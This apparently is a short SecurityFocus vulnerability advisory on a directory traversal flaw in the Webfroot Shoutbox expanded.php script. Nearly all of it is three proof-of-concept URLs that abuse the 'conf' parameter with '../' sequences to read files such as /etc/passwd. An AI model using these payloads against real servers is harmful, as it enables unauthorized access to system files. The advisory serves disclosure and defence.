Webfroot Shoutbox Expanded.PHP Remote Directory Traversal Vulnerability

The following proofs-of-concept have been made available:

http://www.example.com/shoutbox/expanded.php?conf=../../../../../../../targetfile

http://www.example.com/shoutbox/expanded.php?conf=../../../../../../../etc/passwd

http://www.example.com/shoutbox/expanded.php?conf=../../../../../../../etc/issue


 

Privacy Statement
Copyright 2010, SecurityFocus